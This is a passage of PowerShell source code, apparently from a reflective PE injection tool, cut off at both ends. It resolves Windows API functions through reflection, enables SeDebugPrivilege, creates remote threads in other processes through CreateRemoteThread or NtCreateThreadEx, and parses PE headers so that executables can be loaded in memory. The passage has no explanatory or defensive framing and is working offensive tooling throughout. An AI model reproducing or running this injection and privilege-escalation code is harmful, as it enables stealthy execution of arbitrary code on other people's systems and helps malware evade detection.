- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
- $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
- $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
- $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
- $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
- $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
- return $Win32Constants
- }
- Function Get-Win32Functions
- {
- $Win32Functions = New-Object System.Object
- $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
- $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
- $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
- $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc
- $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
- $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
- $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
- $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx
- $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
- $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
- $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy
- $memsetAddr = Get-ProcAddress msvcrt.dll memset
- $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
- $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset
- $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
- $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
- $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary
- $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
- $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
- $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress
- $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress
- $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])
- $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr
- $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
- $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
- $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
- $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree
- $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx
- $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
- $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)
- $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx
- $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect
- $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
- $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)
- $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect
- $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
- $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
- $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
- $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
- $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
- $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
- $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
- $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
- $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
- $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess
- $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
- $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])
- $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject
- $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
- $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
- $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory
- $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory
- $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
- $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory
- $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
- $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
- $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread
- $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread
- $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])
- $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread
- $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken
- $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
- $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken
- $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread
- $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])
- $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread
- $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
- $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges
- $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA
- $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])
- $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue
- $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf
- $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])
- $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf
- if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {
- $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
- $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
- $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
- }
- $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
- $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
- $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process
- $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread
- $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
- $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread
- return $Win32Functions
- }
- Function Sub-SignedIntAsUnsigned
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [Int64]
- $Value1,
- [Parameter(Position = 1, Mandatory = $true)]
- [Int64]
- $Value2
- )
- [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
- [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
- [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
- if ($Value1Bytes.Count -eq $Value2Bytes.Count)
- {
- $CarryOver = 0
- for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
- {
- $Val = $Value1Bytes[$i] - $CarryOver
- if ($Val -lt $Value2Bytes[$i])
- {
- $Val += 256
- $CarryOver = 1
- }
- else
- {
- $CarryOver = 0
- }
- [UInt16]$Sum = $Val - $Value2Bytes[$i]
- $FinalBytes[$i] = $Sum -band 0x00FF
- }
- }
- else
- {
- Throw "Cannot subtract bytearrays of different sizes"
- }
- return [BitConverter]::ToInt64($FinalBytes, 0)
- }
- Function Add-SignedIntAsUnsigned
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [Int64]
- $Value1,
- [Parameter(Position = 1, Mandatory = $true)]
- [Int64]
- $Value2
- )
- [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
- [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
- [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
- if ($Value1Bytes.Count -eq $Value2Bytes.Count)
- {
- $CarryOver = 0
- for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
- {
- [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
- $FinalBytes[$i] = $Sum -band 0x00FF
- if (($Sum -band 0xFF00) -eq 0x100)
- {
- $CarryOver = 1
- }
- else
- {
- $CarryOver = 0
- }
- }
- }
- else
- {
- Throw "Cannot add bytearrays of different sizes"
- }
- return [BitConverter]::ToInt64($FinalBytes, 0)
- }
- Function Compare-Val1GreaterThanVal2AsUInt
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [Int64]
- $Value1,
- [Parameter(Position = 1, Mandatory = $true)]
- [Int64]
- $Value2
- )
- [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
- [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
- if ($Value1Bytes.Count -eq $Value2Bytes.Count)
- {
- for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)
- {
- if ($Value1Bytes[$i] -gt $Value2Bytes[$i])
- {
- return $true
- }
- elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])
- {
- return $false
- }
- }
- }
- else
- {
- Throw "Cannot compare byte arrays of different size"
- }
- return $false
- }
- Function Convert-UIntToInt
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [UInt64]
- $Value
- )
- [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)
- return ([BitConverter]::ToInt64($ValueBytes, 0))
- }
- Function Get-Hex
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- $Value
- )
- $ValueSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2
- $Hex = "0x{0:X$($ValueSize)}" -f [Int64]$Value
- return $Hex
- }
- Function Test-MemoryRangeValid
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [String]
- $DebugString,
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $PEInfo,
- [Parameter(Position = 2, Mandatory = $true)]
- [IntPtr]
- $StartAddress,
- [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
- [IntPtr]
- $Size
- )
- [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
- $PEEndAddress = $PEInfo.EndAddress
- if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)
- {
- Throw "Trying to write to memory smaller than allocated address range. $DebugString"
- }
- if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)
- {
- Throw "Trying to write to memory greater than allocated address range. $DebugString"
- }
- }
- Function Write-BytesToMemory
- {
- Param(
- [Parameter(Position=0, Mandatory = $true)]
- [Byte[]]
- $Bytes,
- [Parameter(Position=1, Mandatory = $true)]
- [IntPtr]
- $MemoryAddress
- )
- for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)
- {
- [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])
- }
- }
- Function Get-DelegateType
- {
- Param
- (
- [OutputType([Type])]
- [Parameter( Position = 0)]
- [Type[]]
- $Parameters = (New-Object Type[](0)),
- [Parameter( Position = 1 )]
- [Type]
- $ReturnType = [Void]
- )
- $Domain = [AppDomain]::CurrentDomain
- $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
- $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
- $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
- $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
- $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
- $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
- $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
- $MethodBuilder.SetImplementationFlags('Runtime, Managed')
- Write-Output $TypeBuilder.CreateType()
- }
- Function Get-ProcAddress
- {
- Param
- (
- [OutputType([IntPtr])]
- [Parameter( Position = 0, Mandatory = $True )]
- [String]
- $Module,
- [Parameter( Position = 1, Mandatory = $True )]
- [String]
- $Procedure
- )
- $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
- Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }
- $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
- $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
- Try
- {
- $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
- }
- Catch
- {
- $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress',
- [reflection.bindingflags] "Public,Static",
- $null,
- [System.Reflection.CallingConventions]::Any,
- @((New-Object System.Runtime.InteropServices.HandleRef).GetType(),
- [string]),
- $null)
- }
- $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
- $tmpPtr = New-Object IntPtr
- $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
- Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
- }
- Function Enable-SeDebugPrivilege
- {
- Param(
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $Win32Functions,
- [Parameter(Position = 2, Mandatory = $true)]
- [System.Object]
- $Win32Types,
- [Parameter(Position = 3, Mandatory = $true)]
- [System.Object]
- $Win32Constants
- )
- [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
- if ($ThreadHandle -eq [IntPtr]::Zero)
- {
- Throw "Unable to get the handle to the current thread"
- }
- [IntPtr]$ThreadToken = [IntPtr]::Zero
- [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
- if ($Result -eq $false)
- {
- $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
- if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
- {
- $Result = $Win32Functions.ImpersonateSelf.Invoke(3)
- if ($Result -eq $false)
- {
- Throw "Unable to impersonate self"
- }
- $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
- if ($Result -eq $false)
- {
- Throw "Unable to OpenThreadToken."
- }
- }
- else
- {
- Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
- }
- }
- [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
- $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
- if ($Result -eq $false)
- {
- Throw "Unable to call LookupPrivilegeValue"
- }
- [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
- [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
- $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
- $TokenPrivileges.PrivilegeCount = 1
- $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
- $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)
- $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
- $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
- if (($Result -eq $false) -or ($ErrorCode -ne 0))
- {
- }
- [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
- }
- Function Create-RemoteThread
- {
- Param(
- [Parameter(Position = 1, Mandatory = $true)]
- [IntPtr]
- $ProcessHandle,
- [Parameter(Position = 2, Mandatory = $true)]
- [IntPtr]
- $StartAddress,
- [Parameter(Position = 3, Mandatory = $false)]
- [IntPtr]
- $ArgumentPtr = [IntPtr]::Zero,
- [Parameter(Position = 4, Mandatory = $true)]
- [System.Object]
- $Win32Functions
- )
- [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero
- $OSVersion = [Environment]::OSVersion.Version
- if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
- {
- $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
- $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
- if ($RemoteThreadHandle -eq [IntPtr]::Zero)
- {
- Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
- }
- }
- else
- {
- $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
- }
- if ($RemoteThreadHandle -eq [IntPtr]::Zero)
- {
- Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop
- }
- return $RemoteThreadHandle
- }
- Function Get-ImageNtHeaders
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [IntPtr]
- $PEHandle,
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $Win32Types
- )
- $NtHeadersInfo = New-Object System.Object
- $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)
- [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
- $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr
- $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)
- if ($imageNtHeaders64.Signature -ne 0x00004550)
- {
- throw "Invalid IMAGE_NT_HEADER signature."
- }
- if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
- {
- $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64
- $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
- }
- else
- {
- $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
- $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32
- $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
- }
- return $NtHeadersInfo
- }
- Function Get-PEBasicInfo
- {
- Param(
- [Parameter( Position = 0, Mandatory = $true )]
- [Byte[]]
- $PEBytes,
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $Win32Types
- )
- $PEInfo = New-Object System.Object
- [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)
- [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null
- $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types
- $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)
- $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
- $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
- $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
- $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)
- [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)
- return $PEInfo
- }
- Function Get-PEDetailedInfo
- {
- Param(
- [Parameter( Position = 0, Mandatory = $true)]
- [IntPtr]
- $PEHandle,
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $Win32Types,
- [Parameter(Position = 2, Mandatory = $true)]
- [System.Object]
- $Win32Constants
- )
- if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)
- {
- throw 'PEHandle is null or IntPtr.Zero'
- }
- $PEInfo = New-Object System.Object
- $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types
- $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle
- $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)
- $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)
- $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)
- $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
- if ($PEInfo.PE64Bit -eq $true)
- {
- [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
